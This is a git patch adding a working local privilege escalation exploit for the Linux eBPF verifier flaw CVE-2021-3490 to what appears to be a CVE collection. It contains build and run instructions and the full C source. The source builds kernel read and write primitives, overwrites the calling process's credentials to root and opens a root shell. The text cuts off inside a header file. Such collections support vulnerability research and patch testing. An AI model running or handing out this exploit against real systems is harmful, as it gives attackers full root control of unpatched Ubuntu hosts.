From 94c41236e9885738ad746ae7e3a798646f4c233f Mon Sep 17 00:00:00 2001 From: ren1319 Date: Mon, 13 Mar 2023 14:43:32 +0800 Subject: [PATCH] add CVE-2021-3490 --- cve/linux-kernel/2021/CVE-2021-3490/Makefile | 16 + cve/linux-kernel/2021/CVE-2021-3490/README.md | 43 ++ .../2021/CVE-2021-3490/bin/.placeholder | 0 cve/linux-kernel/2021/CVE-2021-3490/bpf.c | 128 ++++ cve/linux-kernel/2021/CVE-2021-3490/exploit.c | 578 ++++++++++++++++++ .../2021/CVE-2021-3490/include/bpf_defs.h | 170 ++++++ .../CVE-2021-3490/include/exploit_configs.h | 114 ++++ .../2021/CVE-2021-3490/include/kernel_defs.h | 160 +++++ .../2021/CVE-2021-3490/include/kmem_search.h | 12 + .../2021/CVE-2021-3490/kmem_search.c | 276 +++++++++ cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml | 24 + openkylin_list.yaml | 1 + 12 files changed, 1522 insertions(+) create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/Makefile create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/README.md create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/bpf.c create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/exploit.c create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c create mode 100644 cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml diff --git a/cve/linux-kernel/2021/CVE-2021-3490/Makefile b/cve/linux-kernel/2021/CVE-2021-3490/Makefile new file mode 100644 index 00000000..ceff9b21 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/Makefile @@ -0,0 +1,16 @@ +CC=gcc +LPE =lpe + +BIN = bin/ +INC = include/ + +CMP = -o $(BIN)exploit.bin -I $(INC) exploit.c bpf.c kmem_search.c + +groovy: + $(CC) -DGROOVY $(CMP) + +hirsute: + $(CC) -DHIRSUTE $(CMP) + +clean: + rm $(BIN)exploit.bin diff --git a/cve/linux-kernel/2021/CVE-2021-3490/README.md b/cve/linux-kernel/2021/CVE-2021-3490/README.md new file mode 100644 index 00000000..dff07d77 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/README.md @@ -0,0 +1,43 @@ +# Linux_LPE_eBPF_CVE-2021-3490 + +LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.04.02 and 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. +and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. +The vulnerability was discovered by Manfred Paul [@_manfp](https://twitter.com/_manfp) and fixed in this [commit](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e). + +author: [@chompie1337](https://twitter.com/chompie1337) + +For educational/research purposes only. Use at your own risk. + +## Usage: + +To build for Ubuntu 20.04.02 and Ubuntu 20.10 (Groovy Gorilla): +``` +make groovy +``` +To build for Ubuntu 21.04 (Hirsute Hippo): +``` +make hirsute +``` +To run: +``` +bin/exploit.bin +[+] eBPF enabled, maps created! +[+] addr of oob BPF array map: ffffa008c1202110 +[+] addr of array_map_ops: ffffffff956572a0 +[+] kernel read successful! +[!] searching for init_pid_ns in kstrtab ... +[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a +[!] searching for init_pid_ns in ksymtab... +[+] addr of init_pid_ns ffffffff96062d00 +[!] searching for creds for pid: 770 +[+] addr of cred structure: ffffa0086758dec0 +[!] preparing to overwrite creds... +[+] success! enjoy r00t :) +# +``` + +Note: You **must** cleanly exit the root shell by typing `exit` to perform cleanup and avoid a kernel panic. + +Checkout the writeup [Kernel Pwning with eBPF: a Love Story](https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story). + +This research was sponsered by [Grapl](https://www.graplsecurity.com/). diff --git a/cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder b/cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder new file mode 100644 index 00000000..e69de29b diff --git a/cve/linux-kernel/2021/CVE-2021-3490/bpf.c b/cve/linux-kernel/2021/CVE-2021-3490/bpf.c new file mode 100644 index 00000000..e878fd23 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/bpf.c @@ -0,0 +1,128 @@ +#include +#include +#include +#include +#include +#include + + +int bpf(int cmd, union bpf_attr *attrs) +{ + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int create_map(union bpf_attr* attrs) +{ + int ret = -1; + + ret = bpf(BPF_MAP_CREATE, attrs); + + return ret; +} + +int update_map_element(int map_fd, uint64_t key, void* value, uint64_t flags) +{ + int ret = -1; + + union bpf_attr attr = + { + .map_fd = map_fd, + .key = (uint64_t)&key, + .value = (uint64_t)value, + .flags = flags, + }; + + ret = bpf(BPF_MAP_UPDATE_ELEM, &attr); + + return ret; +} + +int lookup_map_element(int map_fd, uint64_t key, void* value) +{ + int ret = -1; + union bpf_attr attr = + { + .map_fd = map_fd, + .key = (uint64_t)&key, + .value = (uint64_t)value, + }; + + ret = bpf(BPF_MAP_LOOKUP_ELEM, &attr); + + return ret; +} + +int obj_get_info_by_fd(union bpf_attr* attrs) +{ + int ret = -1; + + ret = bpf(BPF_OBJ_GET_INFO_BY_FD, attrs); + + return ret; +} + +int run_bpf_prog(struct bpf_insn* insn, uint32_t cnt, int* prog_fd_out) +{ + int ret = -1; + int prog_fd = -1; + char verifier_log_buff[0x200000] = {0}; + int socks[2] = {0}; + union bpf_attr prog_attrs = + { + .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = cnt, + .insns = (uint64_t)insn, + .license = (uint64_t)"", + .log_level = 2, + .log_size = sizeof(verifier_log_buff), + .log_buf = (uint64_t)verifier_log_buff + }; + + if(NULL != prog_fd_out) + { + prog_fd = *prog_fd_out; + } + + if(0 >= prog_fd) + { + prog_fd = bpf(BPF_PROG_LOAD, &prog_attrs); + } + + if(0 > prog_fd) + { + puts(verifier_log_buff); + goto done; + } + + if(0 != socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) + { + goto done; + } + + if(0 != setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(int))) + { + goto done; + } + + if(0x7 != write(socks[1], "ch0mpie", 0x7)) + { + goto done; + } + + if(NULL != prog_fd_out) + { + *prog_fd_out = prog_fd; + } + + else + { + close(prog_fd); + } + + ret = 0; + +done: + close(socks[0]); + close(socks[1]); + return ret; +} \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/exploit.c b/cve/linux-kernel/2021/CVE-2021-3490/exploit.c new file mode 100644 index 00000000..47c6f2ba --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/exploit.c @@ -0,0 +1,578 @@ +/** + LPE exploit for CVE-2021-3490 + + The vulnerability was discovered by Manfred Paul @_manfp and fixed in commit + https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e + + author: @chompie1337 + + For educational/research purposes only. Use at your own risk. +*/ + +#include +#include +#include +#include +#include +#include + +#include "bpf_defs.h" +#include "kernel_defs.h" +#include "kmem_search.h" +#include "exploit_configs.h" + + +int kernel_read_uint(exploit_context* pCtx, uint64_t addr, uint32_t* puiData) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + uint64_t btf_addr = addr - BTF_ID_OFFSET; + struct bpf_map_info_kernel info = {0}; + union bpf_attr attrs = + { + .info.bpf_fd = pCtx->oob_map_fd, + .info.info = (long long unsigned int)&info, + .info.info_len = sizeof(info) + }; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_BTF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_BTF_OFFSET), + // subtract BPF_MAP_BTF_OFFSET from oob map value pointer so it points to + // bpf_map->btf + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // load the leak address from store map + BPF_LDX_MEM(BPF_DW, LEAK_VAL_REG, STORE_MAP_REG, 8), + // set bpf_map->btf = leak address. using BPF syscall with command + // BPF_OBJ_GET_INFO_BY_FD will return the value of bpf_map->btf->id + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, LEAK_VAL_REG, 0), + BPF_EXIT_INSN() + }; + + memcpy(&vals[sizeof(uint64_t)], &btf_addr, sizeof(uint64_t)); + + if(0 != update_map_element(pCtx->store_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), &pCtx->prog_fd)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != obj_get_info_by_fd(&attrs)) + { + printf("[-] failed to leak memory with BPF_OBJ_GET_INFO_BY_FD \n"); + goto done; + } + + *puiData = info.btf_id; + ret = 0; + +done: + return ret; +} + +int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len) +{ + int ret = -1; + + for(uint32_t i = 0; i < len; i += sizeof(uint32_t)) + { + uint32_t val = 0; + + if(0 != kernel_read_uint(pCtx, addr + i, &val)) + { + goto done; + } + + *(uint32_t*)(buffer + i) = val; + } + + ret = 0; + +done: + return ret; +} + +int kernel_write_uint(exploit_context* pCtx, uint64_t addr, uint32_t val) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + + // addr will be set to index(val) + 1 in array_map_get_next_key + val -=1; + + memcpy(vals, &val, sizeof(uint32_t)); + + if(0 != update_map_element(pCtx->oob_map_fd, 0, vals, addr)) + { + printf("[-] kernel write failed!\n"); + goto done; + } + + ret = 0; + +done: + return ret; +} + +int kernel_write(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len) +{ + int ret = -1; + + for(uint32_t i = 0; i < len; i += sizeof(uint32_t)) + { + addr += i; + uint32_t val = *(uint32_t*)(buffer + i); + + if(0 != kernel_write_uint(pCtx, addr, val)) + { + goto done; + } + } + + ret = 0; + +done: + return ret; +} + +int create_bpf_maps(exploit_context* pCtx) +{ + int ret = -1; + int oob_map_fd = -1; + int store_map_fd = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + union bpf_attr map_attrs = + { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = ARRAY_MAP_SIZE, + .max_entries = 1, + }; + + oob_map_fd = create_map(&map_attrs); + store_map_fd = create_map(&map_attrs); + + if((oob_map_fd < 0) || (store_map_fd) < 0) + { + printf("[-] failed to create bpf array map!\n"); + goto done; + } + + if(0 != update_map_element(oob_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != update_map_element(store_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + pCtx->oob_map_fd = oob_map_fd; + pCtx->store_map_fd = store_map_fd; + + ret = 0; + +done: + return ret; +} + +int leak_oob_map_ptr(exploit_context* pCtx) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + // extend the exploit register's invalid bounds to 64 bits + BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \ + // adding a register with invalid bounds to a pointer causes the verifier to + // mark it as an unbounded value, so we are able to leak its value by saving it + // in the store map + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), \ + // put the value in leak value register + BPF_MOV64_REG(LEAK_VAL_REG, OOB_MAP_REG), \ + // store the leaked BPF ptr into store map + BPF_STX_MEM(BPF_DW, STORE_MAP_REG, LEAK_VAL_REG, 8), \ + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != lookup_map_element(pCtx->store_map_fd, 0, vals)) + { + printf("[-] failed to retrieve storage map element!\n"); + goto done; + } + + memcpy(&pCtx->oob_map_ptr, &vals[sizeof(uint64_t)], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->oob_map_ptr)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int leak_array_map_ops(exploit_context* pCtx) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_OPS_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_OPS_OFFSET), + // subtract BPF_MAP_OPS_OFFSET from oob map value pointer, so it points + // to bpf_map->ops + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // read the value of array_map_ops + BPF_LDX_MEM(BPF_DW, LEAK_VAL_REG, OOB_MAP_REG, 0), + // store the leaked array_map_ops ptr into store map + BPF_STX_MEM(BPF_DW, STORE_MAP_REG, LEAK_VAL_REG, 8), + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != lookup_map_element(pCtx->store_map_fd, 0, vals)) + { + printf("[-] failed to retrieve storage map element!\n"); + goto done; + } + + memcpy(&pCtx->array_map_ops, &vals[sizeof(uint64_t)], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->array_map_ops)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int test_kernel_read(exploit_context* pCtx) +{ + int ret = -1; + uint64_t kernel_addr = 0; + + pCtx->state = EXPLOIT_STATE_READ; + + if(0 != kernel_read(pCtx, pCtx->array_map_ops, (char*)&kernel_addr, sizeof(uint64_t))) + { + goto done; + } + + if(!IS_KERNEL_POINTER(kernel_addr)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int prepare_kernel_write(exploit_context* pCtx) +{ + int ret = -1; + char array_map_ops[ARRAY_MAP_SIZE] = {0}; + uint64_t array_map_get_next_key = 0; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // store copy of exploit register + BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), + // load oob map values pointer in leak register + BPF_LD_IMM64(LEAK_VAL_REG, pCtx->oob_map_ptr), + // exploit reg value is BPF_MAP_OPS_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_OPS_OFFSET), + // subtract BPF_MAP_OPS_OFFSET from oob map value pointer, so it points + // to bpf_map->ops + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // overwrite bpf_map->ops to point to the first value in oob map, where we store + // fake bpf_map_ops structure + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, LEAK_VAL_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to 0 + BPF_MOV64_IMM(CONST_REG, 0x0), + // exploit reg value is BPF_MAP_SPIN_LOCK_OFF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_SPIN_LOCK_OFF_OFFSET), + // subtract BPF_MAP_SPIN_LOCK_OFF_OFFSET from oob map value pointer, so it points + // to bpf_map->spin_lock_off + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->spin_lock_off = 0 to bypass checks + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to 0xFFFFFFFF + BPF_MOV64_IMM(CONST_REG, 0xFFFFFFFF), + // exploit reg value is BPF_MAP_MAX_ENTRIES_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_MAX_ENTRIES_OFFSET), + // subtract BPF_MAP_MAX_ENTRIES_OFFSET from oob map value pointer, so it points + // to bpf_map->max_entries + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->max_entries = 0xFFFFFFFF + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to BPF_MAP_TYPE_STACK + BPF_MOV64_IMM(CONST_REG, BPF_MAP_TYPE_STACK), + // exploit reg value is BPF_MAP_TYPE_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_TYPE_OFFSET), + // subtract BPF_MAP_TYPE_OFFSET from oob map value pointer, so it points + // to bpf_map->map_type + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->map_type = BPF_MAP_TYPE_STACK to be able to call map_push_elem + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + BPF_EXIT_INSN() + }; + + if(0 != kernel_read(pCtx, pCtx->array_map_ops, array_map_ops, BPF_MAP_OPS_OFFSET)) + { + goto done; + } + + memcpy(&array_map_get_next_key, &array_map_ops[MAP_OPS_GET_NEXT_KEY_OFFSET], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(array_map_get_next_key)) + { + goto done; + } + + memcpy(&array_map_ops[MAP_OPS_PUSH_ELEM_OFFSET], &array_map_get_next_key, sizeof(uint64_t)); + + if(0 != update_map_element(pCtx->oob_map_fd, 0, array_map_ops, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + pCtx->state = EXPLOIT_STATE_WRITE; + + ret = 0; + +done: + return ret; +} + +int overwrite_cred(exploit_context* pCtx) +{ + int ret = -1; + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_UID_OFFSET, 0)) + { + goto done; + } + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_GID_OFFSET, 0)) + { + goto done; + } + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_EUID_OFFSET, 0)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +void cleanup_read(exploit_context* pCtx) +{ + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_BTF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_BTF_OFFSET), + // subtract BPF_MAP_BTF_OFFSET from oob map value pointer so it points to + // bpf_map->btf + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set constant register to 0 + BPF_MOV64_IMM(CONST_REG, 0x0), + // overwrite the value of bpf_map->btf to 0 + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, CONST_REG , 0), + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] warning, failed to run cleanup read BPF program!\n"); + } + + pCtx->state = EXPLOIT_STATE_CLEAN; +} + +void cleanup_write(exploit_context* pCtx) +{ + uint64_t null = 0; + + // restore bpf_map->btf = NULL + if(0 != kernel_write(pCtx, pCtx->oob_map_ptr - BPF_MAP_BTF_OFFSET, (char*)&null, sizeof(uint64_t))) + { + printf("[-] warning, cleanup failed! this will cause instability...\n"); + goto done; + } + + // restore bpf_map->map_type = BPF_MAP_TYPE_ARRAY + if(0 != kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_TYPE_OFFSET, BPF_MAP_TYPE_ARRAY)) + { + printf("[-] warning, cleanup failed! this will cause instability...\n"); + goto done; + } + + // We can't restore the rest of the values without breaking the write primitive, and we can't run another BPF program + // because we overwrote spin_lock_off. However, this is enough to exit cleanly. + + pCtx->state = EXPLOIT_STATE_CLEAN; + +done: + return; +} + +void cleanup(exploit_context* pCtx) +{ + switch(pCtx->state) + { + case EXPLOIT_STATE_READ: + cleanup_read(pCtx); + break; + case EXPLOIT_STATE_WRITE: + cleanup_write(pCtx); + break; + case EXPLOIT_STATE_CLEAN: + default: + break; + } +} + +int main(int argc, char **argv) +{ + exploit_context ctx = {0}; + pid_t current_pid = getpid(); + + if(0 != create_bpf_maps(&ctx)) + { + printf("[-] failed to create bpf maps!\n"); + goto done; + } + + printf("[+] eBPF enabled, maps created!\n"); + + if(0 != leak_oob_map_ptr(&ctx)) + { + printf("[-] failed to leak ptr to BPF map!\n"); + goto done; + } + + printf("[+] addr of oob BPF array map: %lx\n", ctx.oob_map_ptr); + + if (0 != leak_array_map_ops(&ctx)) + { + printf("[-] failed to leak address of array_map_ops!\n"); + goto done; + } + + printf("[+] addr of array_map_ops: %lx\n", ctx.array_map_ops); + + if(0 != test_kernel_read(&ctx)) + { + printf("[-] kernel read failed!\n"); + goto done; + } + + printf("[+] kernel read successful!\n"); + printf("[!] searching for init_pid_ns in kstrtab ...\n"); + + if(0 != search_init_pid_ns_kstrtab(&ctx)) + { + printf("[-] failed to find init_pid_ns in kstrtab!\n"); + goto done; + } + + printf("[+] addr of init_pid_ns in kstrtab: %lx\n", ctx.init_pid_ns_kstrtab); + printf("[!] searching for init_pid_ns in ksymtab...\n"); + + if(0 != search_init_pid_ns_ksymtab(&ctx)) + { + printf("[-] failed to find init_pid_ns in ksymtab!\n"); + goto done; + } + + printf("[+] addr of init_pid_ns %lx\n", ctx.init_pid_ns); + printf("[!] searching for creds for pid: %0x\n", current_pid); + + if(0 != find_pid_cred(&ctx, current_pid)) + { + printf("[-] failed to find addr of current creds!\n"); + goto done; + } + + printf("[+] addr of cred structure: %lx\n", ctx.cred); + + if(0 != prepare_kernel_write(&ctx)) + { + printf("[-] failed to set up maps for kernel write!\n"); + goto done; + } + + printf("[!] preparing to overwrite creds...\n"); + + if(0 != overwrite_cred(&ctx)) + { + printf("[-] LPE failed :(\n"); + goto done; + } + + printf("[+] success! enjoy r00t :)\n"); + system("sh"); + +done: + cleanup(&ctx); + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h new file mode 100644 index 00000000..0dc497f2 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h @@ -0,0 +1,170 @@ +#ifndef _BPF_DEFS_H_ +#define _BPF_DEFS_H_ + + +/* Raw code statement block */ + +#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = CODE, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = IMM }) + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) + +/* Memory load, dst_reg = *(uint *) (src_reg + off16) */ + +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Memory store, *(uint *) (dst_reg + off16) = src_reg */ + +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */ + +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */ + +#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = imm32 */ + +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_MOV32_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = src_reg */ + +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ + +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ + +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* Program exit */ + +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) + + +/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */ +#define BPF_LD_IMM64(DST, IMM) \ + BPF_LD_IMM64_RAW(DST, 0, IMM) + +/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) + +// varies from userspace bpf_map_info definition so need to redefine +struct bpf_map_info_kernel +{ + __u32 type; + __u32 id; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 btf_vmlinux_value_type_id; + __u64 netns_dev; + __u64 netns_ino; + __u32 btf_id; + __u32 btf_key_type_id; + __u32 btf_value_type_id; +} __attribute__((aligned(8))); + + +int create_map(union bpf_attr* map_attrs); +int update_map_element(int map_fd, uint64_t key, void* value, uint64_t flags); +int lookup_map_element(int map_fd, int64_t key, void* pDestBuff); +int obj_get_info_by_fd(union bpf_attr* attrs); +int run_bpf_prog(struct bpf_insn* insn, uint32_t cnt, int* prog_fd_out); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h new file mode 100644 index 00000000..d5ef53ed --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h @@ -0,0 +1,114 @@ +#ifndef _EXPLOIT_CONFIGS_H_ +#define _EXPLOIT_CONFIGS_H_ + +#define ARRAY_MAP_SIZE 0x1337 +#define DUMMY_MAP_ADD 0x1000 + +#define EXPLOIT_STATE_CLEAN 0 +#define EXPLOIT_STATE_READ 1 +#define EXPLOIT_STATE_WRITE 2 + +#define STORE_MAP_REG BPF_REG_2 +#define OOB_MAP_REG BPF_REG_3 +#define EXPLOIT_REG BPF_REG_4 +#define CONST_REG BPF_REG_5 +#define LEAK_VAL_REG BPF_REG_6 +#define UNKOWN_VALUE_REG BPF_REG_7 +#define COPY_REG BPF_REG_8 + + +typedef struct exploit_context +{ + int oob_map_fd; + int store_map_fd; + int prog_fd; + uint64_t oob_map_ptr; + uint64_t array_map_ops; + uint64_t init_pid_ns_kstrtab; + uint64_t init_pid_ns; + uint64_t cred; + uint32_t state; +} exploit_context; + + +// The exploit 